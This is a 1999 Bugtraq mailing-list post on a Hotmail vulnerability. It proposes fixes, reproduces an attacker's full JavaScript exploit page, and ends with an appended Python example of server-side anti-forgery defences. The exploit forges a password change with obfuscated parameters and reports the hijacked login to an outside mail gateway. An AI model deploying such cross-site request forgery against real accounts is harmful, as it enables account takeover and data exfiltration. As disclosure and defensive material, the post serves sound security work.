[10460] in bugtraq
hotmail claims vulnerability patched, so here it is
daemon@ATHENA.MIT.EDU (David L. Nicol)
Thu May 6 16:13:18 1999
Message-Id: <3730C6C6.2FA62E30@kasey.umkc.edu>
Date: Wed, 5 May 1999 17:31:34 -0500
Reply-To: "David L. Nicol" <david@KASEY.UMKC.EDU>
From: "David L. Nicol" <david@KASEY.UMKC.EDU>
X-To: paulf@cnet.com
To: BUGTRAQ@NETSPACE.ORG
Dear Paul:
I am reading your previous article on hotmail security,
http://www.news.com/News/Item/0,4,33996,00.html
and I'm CCing this message to the bugtraq list.
A good patch from Hotmail would have to involve some additional
info with the cookie.
A couple of approaches that come to mind include:

- verifying http_referer data in the script submission to make sure it's
from the expected hotmail page
- putting additional hidden key fields with constantly changing names
and values on submittable pages, to provide verification that the pages
are legit
- investigating any incidents of pages being submitted with incorrect,
nonexistent, or unexpected "secret flag fields" as described above
I don't work for hotmail (as you know) and I am caught up in this
as a bystander;
I would expect hotmail to give you an explanation of their patch that not
only is detailed but makes sense and that you cannot find a hole in.
If hotmail merely changed the names of variables, or did a similar
short-term fix, the next exploit might not be nice enough to announce
itself as such. Modifying the attached El Lite exploit to only work
if it had a particular hotmail account might be a piece of cake, allowing
for some highly targeted kinds of attacks (esp. if a hotmail user is
doing anything involving return-email verification, like tipjar or first
virtual).
Here is the hacker's tripod page, including the exploit that
takes advantage of the trust hotmail has for instructions from
your browser, by secretly sending instructions to hotmail to change
your password to
<HTML>
<kraffa2="<HEAD>
<!--Begin JavaScrypt roadmap code. If editing downloaded HTML source, delete
this portion.-->
<scrypt language="JavaScrypt">
<!--
function TripodShowPopup()
{
// open the popup window
var popupURL = "http://members.tripod.com/adm/popup/roadmap.shtml";
var popup = window.open(popupURL,"TripodPopup",'toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=0,width=575,height=105');
// set the opener if it's not already set. it's set automatically
// in netscape 3.0+ and ie 3.0+.
if( navigator.appName.substring(0,8) == "Netscape" )
{
popup.location = popupURL;
}
}
TripodShowPopup();
// -->
</scrypt>
<!--End inserted JavaScript code.-->
<base href="http://members.tripod.com/kraffa2/Hook.html">
</HEAD>
<body>
<scrypt>
<!--
// Pull a named parameter out of a query string (nombre = name, elURL = the URL, vacio = empty string)
function getCGIValue(nombre, elURL)
{
elURL= elURL;
nombre= nombre+"=";
vacio="";
found= elURL.indexOf(nombre);
if (found > -1)
{
found2= elURL.indexOf("&",found);
found+= nombre.length;
end= (found2 > -1) ? found2 : elURL.length;
var value= elURL.substring(found, end);
value= (value != null) ? value : vacio;
return value;
}
else {return vacio;}
}
// The victim's Hotmail "disk" and "login" values arrive in this lure page's own query string
Query= unescape(self.location.search);
disk= getCGIValue("disk", Query);
login= getCGIValue("login", Query);
host= "www.hotmail.com";
// New hint question (HTML) and hint answer ('%66axf%61x' URL-decodes to "faxfax")
hintq= escape('<img src="http://www.badenpage.de/pirate/bilder/flagge.jpg"><br><center>by El Lite©</center>');
hinta= '%66axf%61x';
// The password-change request. Parameter names and values are percent-encoded only to
// obscure them (new_%70%61%73s%77d = new_passwd, %6B%6B%6A%6A01 = kkjj01, hi%6E%74q = hintq).
// Hotmail honours it because the victim's browser attaches the victim's session cookie.
TheURL= "http://"+host+"/cgi-bin/dopassword?"+"disk="+disk+"&login="+login+"&f=34145&curmbox=ACTIVE&_lang=&np=yes&new_%70%61%73s%77d=%6B%6B%6A%6A01&new_%70%61%73s%77d2=kk%6A%6A01&hi%6E%74q="+hintq+"&hinta="+hinta;
// Report the hijacked login and the victim's user agent to the attacker via a tipjar.com mail gateway
// (the Spanish subject text reads "HMpass changed / Your browser is ...")
Mail= "http://www.tipjar.com/cgi-bin/generic?mailto=paulinaporizkova@hotmail.com&mailfrom="+login+"@hotmail.com&subject="+login+"+HMpass+cambiada+%0A%0ASu+navegador+es+"+escape(navigator.userAgent+"\n.\n");
options= 'toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=0,width=575,height=105';
// Fire both requests in small popups and close them after 8 seconds
HOTMAIL= window.open(TheURL,"HOTMAIL",options);
self.focus();
setTimeout("HOTMAIL.close()",8000);
MAIL= window.open(Mail,"MAIL",options);
self.focus();
setTimeout("MAIL.close()",8000);
//-->
</scrypt>
<pre><b>
One of the best free e-mail services in existence is precisely the one
you are using, hotmail. Its security and inviolability are already
legendary.
So much so that, would you believe it, from this very moment things
are going to take a different turn. I mean that, regrettably, your
hotmail address has been disabled, or rather, hijacked by me.
You will never be able to get into it again.
As final as that. Now it is
ONLY MIIINE!!!! :-))))
Since I'm a good guy and you are not my only victim, one of these days
I am going to
post on es.comp.hackers the password I set for you (it's the same one
for all of you
suckers)
There you go, hope it goes easy on you
El Lite©
</b></pre>
</body>
</html>
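The three countermeasures suggested in the message above (a Referer check, hidden fields whose names and values change on every page, and logging of submissions whose token is missing or wrong), as an added Python example that is not part of the original post and is not Hotmail's code. The handler names (issue_form_token, handle_dopassword, request_from_url), the session store layout, the request dict shape and the sample session are assumptions made for the illustration; the only piece taken from the page is the shape of the exploit's dopassword URL, which the example parses to show that the percent-encoded parameter names hide nothing from the server.

```python
"""Server-side defences for a password-change handler, following the three
suggestions in the post: Referer check, per-page rotating hidden field, and a
log of bad submissions.  Added example, not Hotmail's code; every name and the
sample data below are assumptions made for the illustration."""
import hashlib
import hmac
import secrets
import time
from urllib.parse import parse_qs, urlsplit

SERVER_SECRET = secrets.token_bytes(32)   # assumed: loaded from server config
TRUSTED_HOSTS = {"www.hotmail.com"}        # hosts that may legitimately post the form
TOKEN_TTL = 600                            # seconds a hidden field stays valid
incidents = []                             # suspicious submissions, for follow-up


def _mac(session_id, issued, nonce, field_name):
    msg = f"{session_id}|{issued}|{nonce}|{field_name}".encode()
    return hmac.new(SERVER_SECRET, msg, hashlib.sha256).hexdigest()


def issue_form_token(session_id, sessions, now=None):
    """Called when the password page is rendered.  Returns the hidden field's
    (name, value); the name is remembered in the session so the handler knows
    which field to look for.  Both change on every issue, so a page hosted
    elsewhere cannot hard-code them into a URL the way the exploit does."""
    now = int(time.time() if now is None else now)
    nonce = secrets.token_hex(8)
    name = "fld_" + secrets.token_hex(4)
    sessions[session_id]["form_field"] = name
    return name, f"{now}.{nonce}.{_mac(session_id, now, nonce, name)}"


def _token_ok(session_id, name, value, now):
    try:
        issued, nonce, mac = value.split(".")
        issued = int(issued)
    except ValueError:
        return False
    if not 0 <= now - issued <= TOKEN_TTL:
        return False
    return hmac.compare_digest(mac, _mac(session_id, issued, nonce, name))


def _reject(session, reason, detail):
    incidents.append({"login": session["login"], "reason": reason, "detail": detail})
    return {"status": "rejected", "reason": reason}


def handle_dopassword(request, sessions, now=None):
    """request = {"cookie_session": ..., "referer": ..., "params": {...}}.
    The cookie alone says nothing about where the request came from, which is
    exactly what the exploit relies on; the checks below supply that."""
    now = int(time.time() if now is None else now)
    session = sessions.get(request.get("cookie_session"))
    if session is None:
        return {"status": "rejected", "reason": "no session"}
    params = request.get("params", {})
    ref_host = urlsplit(request.get("referer") or "").hostname
    if ref_host not in TRUSTED_HOSTS:
        return _reject(session, "bad referer", ref_host)
    name = session.get("form_field")
    if not name or name not in params:
        return _reject(session, "missing token", sorted(params))
    if not _token_ok(request["cookie_session"], name, params[name], now):
        return _reject(session, "bad token", params[name])
    session["form_field"] = None            # single use: a replay needs a fresh page
    if params.get("new_passwd") != params.get("new_passwd2"):
        return {"status": "rejected", "reason": "passwords differ"}
    session["password"] = params["new_passwd"]
    return {"status": "ok", "login": session["login"]}


def request_from_url(url, cookie_session, referer):
    """Turn a GET URL like the exploit's TheURL into a request dict.  parse_qs
    percent-decodes names as well as values, so new_%70%61%73s%77d arrives as
    new_passwd: the exploit's encoding hides nothing from the server."""
    query = parse_qs(urlsplit(url).query)
    return {"cookie_session": cookie_session, "referer": referer,
            "params": {k: v[0] for k, v in query.items()}}


# Constructed sample data: one logged-in user, the exploit-style URL from the
# page with the login filled in, then a legitimate submission and a replay.
SESSIONS = {"c0ffee": {"login": "victim", "password": "old", "form_field": None}}
EXPLOIT_URL = ("http://www.hotmail.com/cgi-bin/dopassword?disk=d1&login=victim"
               "&f=34145&curmbox=ACTIVE&_lang=&np=yes"
               "&new_%70%61%73s%77d=%6B%6B%6A%6A01&new_%70%61%73s%77d2=kk%6A%6A01"
               "&hi%6E%74q=hint&hinta=%66axf%61x")


def run_demo(now=1_000_000):
    attack = request_from_url(EXPLOIT_URL, "c0ffee",
                              "http://members.tripod.com/kraffa2/Hook.html")
    r_attack = handle_dopassword(attack, SESSIONS, now)
    name, value = issue_form_token("c0ffee", SESSIONS, now)
    legit = {"cookie_session": "c0ffee",
             "referer": "http://www.hotmail.com/cgi-bin/password",
             "params": {"new_passwd": "s3cret", "new_passwd2": "s3cret", name: value}}
    r_legit = handle_dopassword(legit, SESSIONS, now + 5)
    r_replay = handle_dopassword(legit, SESSIONS, now + 6)
    return r_attack, r_legit, r_replay


if __name__ == "__main__":
    for r in run_demo():
        print(r)
    for i in incidents:
        print("incident:", i)
```

The token check is the decisive control: it is bound to the session, the issue time and the field name by an HMAC under a server secret, so a page on another host can neither guess nor reuse it, and a field rotated per page means a static exploit URL cannot even name the parameter. The Referer check is kept as the post suggests, but treat it as a signal rather than a gate in production, since some clients and proxies strip the header and an absent Referer would otherwise lock out legitimate users; the incidents list is where the post's third suggestion, reviewing odd submissions, starts.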